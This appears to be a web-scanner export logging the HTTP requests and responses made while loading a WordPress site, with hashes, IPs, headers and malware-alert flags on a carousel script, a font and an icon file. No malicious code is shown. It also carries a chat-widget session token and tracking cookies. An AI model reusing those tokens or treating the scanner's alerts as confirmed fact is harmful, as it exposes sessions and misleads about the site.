111.221.45.32 200 OK 18 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash 3b8621875de5d05c8eaff0e926ee41a9
1fc9d27c012e905c13410a3b509f29271bcc6152
db298a4dc6d4f14fc38e8479cdfad019d6edd0bee935f748883563cd023dc788
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "1412d-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 17695
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0
111.221.45.32 200 OK 373 B URL HTTP/1.1 biasbd.com/wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 6c3c2b5c43018392a4c3df17871a5f56
fba911101732bb6df58cdfce5535d60733f159c3
e488e838b05792b01c8a69770395a212314e5ef518fdc97d82d9394e9218b07b
GET /wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 01 Jul 2019 18:27:50 GMT
etag: "441-5d1a50a6-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 373
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/wp-embed.min.js?ver=5.2.16
111.221.45.32 200 OK 743 B URL HTTP/1.1 biasbd.com/wp-includes/js/wp-embed.min.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1391), with no line terminators
Hash b146105040f6faa62806b35ad455d121
14aa49ed4f29b666221a8de3fd17f04455f12b15
05f4d51649be6878352af6843f9a5ffc14bb96ca7a02db21a35a14f6a150b004
GET /wp-includes/js/wp-embed.min.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 15 Apr 2021 13:19:42 GMT
etag: "56f-60783d6e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 743
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/uploads/2018/12/BIAS-250x48.png
111.221.45.32 200 OK 24 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/BIAS-250x48.png
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type PNG image data, 250 x 48, 8-bit/color RGBA, non-interlaced\012- data
Hash 83da6cb7cade509322192bb616f9531e
0ded5573a6adc73c7e023c5450eea60f6c2d4d1d
c4ccfa7e05d3737a7dbd33c906ddac12d76928fe3b9bddb133bca4081905e455
GET /wp-content/uploads/2018/12/BIAS-250x48.png HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: image/png
last-modified: Tue, 25 Dec 2018 13:25:26 GMT
etag: "5cf6-5c222fc6-0;;;"
accept-ranges: bytes
content-length: 23798
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/uploads/2018/12/Footer-Logo.png
111.221.45.32 200 OK 24 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/Footer-Logo.png
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type PNG image data, 250 x 48, 8-bit/color RGBA, non-interlaced\012- data
Hash 416feb62cde2930c989636a326a7103f
8aaa81a4ce1998074ed1d17c10df350306952c5b
562715b9bbb4b2632f475d44a3132c29af1c1b5f9da1f85067cba728df7b5daf
GET /wp-content/uploads/2018/12/Footer-Logo.png HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:58 GMT
content-type: image/png
last-modified: Tue, 25 Dec 2018 16:43:48 GMT
etag: "5cdb-5c225e44-0;;;"
accept-ranges: bytes
content-length: 23771
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/uploads/2018/12/BIAS-Logo-Mobile.png
111.221.45.32 200 OK 17 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/BIAS-Logo-Mobile.png
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type PNG image data, 250 x 48, 8-bit colormap, non-interlaced\012- data
Hash ad04d43a7265b80f4f034f7589e21a42
7fd6f9f3dc7c283d18f3cf83211f71f506ec78a9
0eefe54009aa11413adbc18b91f5397d7ce428b2f6cd6c9df15c209a6e018a7e
GET /wp-content/uploads/2018/12/BIAS-Logo-Mobile.png HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:58 GMT
content-type: image/png
last-modified: Tue, 25 Dec 2018 13:41:14 GMT
etag: "4422-5c22337a-0;;;"
accept-ranges: bytes
content-length: 17442
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0
111.221.45.32 200 OK 77 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type Web Open Font Format (Version 2), TrueType, length 77160, version 4.459\012- data
Hash af7ae505a9eed503f8b8e6982036873e
d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c
2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Referer: http://biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/font-woff2
etag: "12d68-5c21c312-0;;;"
accept-ranges: bytes
content-length: 77160
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 129fe858bf2aa7291fd2c6dd4cf9d226
e3e048b964b851ebbdcfb5bd80ebdbad13720cf6
addc7e4ddab73c8c7ee50f6d33fc1e4ff73b71cc014e481049a393c3b87b0924
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.youtube.com/player_api
172.217.21.174 200 OK 959 B URL HTTP/2 www.youtube.com/player_api
IP 172.217.21.174:0
File type ASCII text, with very long lines (509)
Hash dd6f897e5ce3b7cd82b0299f6bd7f8e4
5d87a5936c04d6cc72b86aade51445acc4bc728e
5a3f2085a56c0351b2f5299702f797cd9117d8ae460684f73ca0b1e125e2e2d3
GET /player_api HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
x-content-type-options: nosniff
expires: Tue, 04 Oct 2022 08:23:58 GMT
date: Tue, 04 Oct 2022 08:23:58 GMT
cache-control: private, max-age=0
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
cross-origin-opener-policy-report-only: same-origin; report-to="youtube_main"
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-resource-policy: cross-origin
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
content-encoding: br
server: ESF
x-xss-protection: 0
set-cookie: YSC=Kt3We10JEg0; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
VISITOR_INFO1_LIVE=za7kdciXzbY; Domain=.youtube.com; Expires=Sun, 02-Apr-2023 08:23:58 GMT; Path=/; Secure; HttpOnly; SameSite=none
CONSENT=PENDING+083; expires=Thu, 03-Oct-2024 08:23:58 GMT; path=/; domain=.youtube.com; Secure
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
biasbd.com/?wc-ajax=get_refreshed_fragments
111.221.45.32 200 OK 273 B URL HTTP/1.1 biasbd.com/?wc-ajax=get_refreshed_fragments
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type JSON data\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (651), with no line terminators
Hash cf1426d78e2f56e4ccc3efa80dff7041
dc32c36de124a6bd7b2b41c848323048106d937a
6be520b9293a64ebea7f2973933b1420e73f489eab9f57d59c7a1443174ded4f
POST /?wc-ajax=get_refreshed_fragments HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: http://biasbd.com
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
access-control-allow-origin: *
access-control-allow-credentials: true
x-content-type-options: nosniff
x-robots-tag: noindex
content-type: application/json; charset=UTF-8
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-transform, no-cache, must-revalidate, max-age=0
content-length: 273
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
biasbd.com/wp-content/uploads/2018/12/icon_7Lz_icon.ico
111.221.45.32 200 OK 50 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/icon_7Lz_icon.ico
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel\012- data
Hash 716b7a5fa64090c844c34233b52e9dce
5fd691493d90f48a68d7796f036d00de66b8e4e1
5948d456a850b34097aebca14298086e473a6a91a243c562777799a24609fdc1
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/2018/12/icon_7Lz_icon.ico HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:58 GMT
content-type: image/x-icon
etag: "c2dd-5c2233da-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 49923
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js
151.101.85.229 200 OK 66 kB URL HTTP/2 cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js
IP 151.101.85.229:0
Hash f851d55788bfd9cf47165f52fe8b77e2
71affb2da4e3648bd6016c692173772cfef2b1b3
40e26abae9efcbb07e7dd072b3c03b29b8995ba01303fd9704404bbc22d00374
GET /emojione/2.2.7/lib/js/emojione.min.js HTTP/1.1
Host: cdn.jsdelivr.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=31536000, s-maxage=31536000, immutable
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-type: application/javascript; charset=utf-8
etag: W/"49dda-cp9vjKV4fYl0Ow7X6yf9dkBr+YU"
content-encoding: gzip
accept-ranges: bytes
date: Tue, 04 Oct 2022 08:24:00 GMT
age: 17018196
x-served-by: cache-fra19156-FRA, cache-bma1636-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 53889
X-Firefox-Spdy: h2
ocsp.globalsign.com/ca/gsatlasr3dvtlsca2022q1
104.18.21.226 200 OK 13 kB URL HTTP/1.1 ocsp.globalsign.com/ca/gsatlasr3dvtlsca2022q1
IP 104.18.21.226:0
Hash d048e4bfe3fe97f4dca6c17b05668054
467a9bdf5d2c592a82d6ed74cf8efe6c21a36d5c
bff21e7e740925707cd8e2f282876c331a7f8bc65d2ce9fef9fdf6d7d146b7fa
POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1
Host: ocsp.globalsign.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 08:24:00 GMT
Content-Type: application/ocsp-response
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "175C52EDC858ADE458D1438BC62851F03D381ECD"
Expires: Tue, 04 Oct 2022 19:00:00 GMT
Last-Modified: Tue, 04 Oct 2022 07:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 1683
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c84c8789b0b49-OSL
vsa105.tawk.to/s/?k=633bed9f2197f171f6595b2d&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiI0ZTM1YjI0ZjUwZGI4NzliZjMzYjUzOGY5N2ZiNWU1Y2RhM2E4MTI0NWNhM2JlMDRmNzg3MTU0NDA1Y2U4YTFkIiwic2lkIjoiNjMzYmVkOWYyMTk3ZjE3MWY2NTk1YjJkIiwiaWF0IjoxNjY0ODcxODM5LCJleHAiOjE2NjQ4NzM2MzksImp0aSI6IkR4d0hlOWxPNDZ5WUNUanphNkpHWCJ9.PxR4EK5YG_NhgOeQZb_CXsYWy-jAokM3IhKBfIgwLPdMnVXCNs3CGK5-FMy4VGtHGnClEMzyQ6zUffUBdXLefQ&EIO=3&transport=websocket&__t=OEY63Q6
172.67.38.66 101 Switching Protocols 814 B URL HTTP/1.1 vsa105.tawk.to/s/?k=633bed9f2197f171f6595b2d&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiI0ZTM1YjI0ZjUwZGI4NzliZjMzYjUzOGY5N2ZiNWU1Y2RhM2E4MTI0NWNhM2JlMDRmNzg3MTU0NDA1Y2U4YTFkIiwic2lkIjoiNjMzYmVkOWYyMTk3ZjE3MWY2NTk1YjJkIiwiaWF0IjoxNjY0ODcxODM5LCJleHAiOjE2NjQ4NzM2MzksImp0aSI6IkR4d0hlOWxPNDZ5WUNUanphNkpHWCJ9.PxR4EK5YG_NhgOeQZb_CXsYWy-jAokM3IhKBfIgwLPdMnVXCNs3CGK5-FMy4VGtHGnClEMzyQ6zUffUBdXLefQ&EIO=3&transport=websocket&__t=OEY63Q6
IP 172.67.38.66:0
Hash be6d6190b2cb8744ffc34bfd28f25b48
d6747ac18fc4fd8351c92e2d9d5eadde16ba9ccc
c52f1813f57ba795ea12b83602e6e7b2f8abc7c94754e495c757470b4c4ae28c
GET /s/?k=633bed9f2197f171f6595b2d&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiI0ZTM1YjI0ZjUwZGI4NzliZjMzYjUzOGY5N2ZiNWU1Y2RhM2E4MTI0NWNhM2JlMDRmNzg3MTU0NDA1Y2U4YTFkIiwic2lkIjoiNjMzYmVkOWYyMTk3ZjE3MWY2NTk1YjJkIiwiaWF0IjoxNjY0ODcxODM5LCJleHAiOjE2NjQ4NzM2MzksImp0aSI6IkR4d0hlOWxPNDZ5WUNUanphNkpHWCJ9.PxR4EK5YG_NhgOeQZb_CXsYWy-jAokM3IhKBfIgwLPdMnVXCNs3CGK5-FMy4VGtHGnClEMzyQ6zUffUBdXLefQ&EIO=3&transport=websocket&__t=OEY63Q6 HTTP/1.1
Host: vsa105.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: http://biasbd.com
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 6eDjkKWj63fLTkaf6L1UgA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Date: Tue, 04 Oct 2022 08:24:00 GMT
Connection: upgrade
upgrade: websocket
sec-websocket-accept: aMdUUY+DSeYnsHFR92BIAmjZMf0=
sec-websocket-extensions: permessage-deflate
strict-transport-security: max-age=0; includeSubDomains; preload
CF-Cache-Status: DYNAMIC
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 754c84c71c77b50b-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-main.js
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-main.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-main.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"da5bb1dc647470204df0e49f5afac2de"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c088e9b4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-runtime.js
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-runtime.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-runtime.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"31ca85b2b61bb42db4e40c2e9429f7dc"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c0991ab4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-app.js
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-app.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-app.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"e736e189edb5d0d9d5b8e7f23dd9114a"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c0a91cb4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-vendor.js
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-vendor.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-vendor.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:59 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"7dcb496e4882926f93f2e73fa87062c0"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c098f0b4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-common.js
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-common.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-chunk-common.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:59 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"c262969ff89da8a8b3994883a0f57085"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c09917b4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
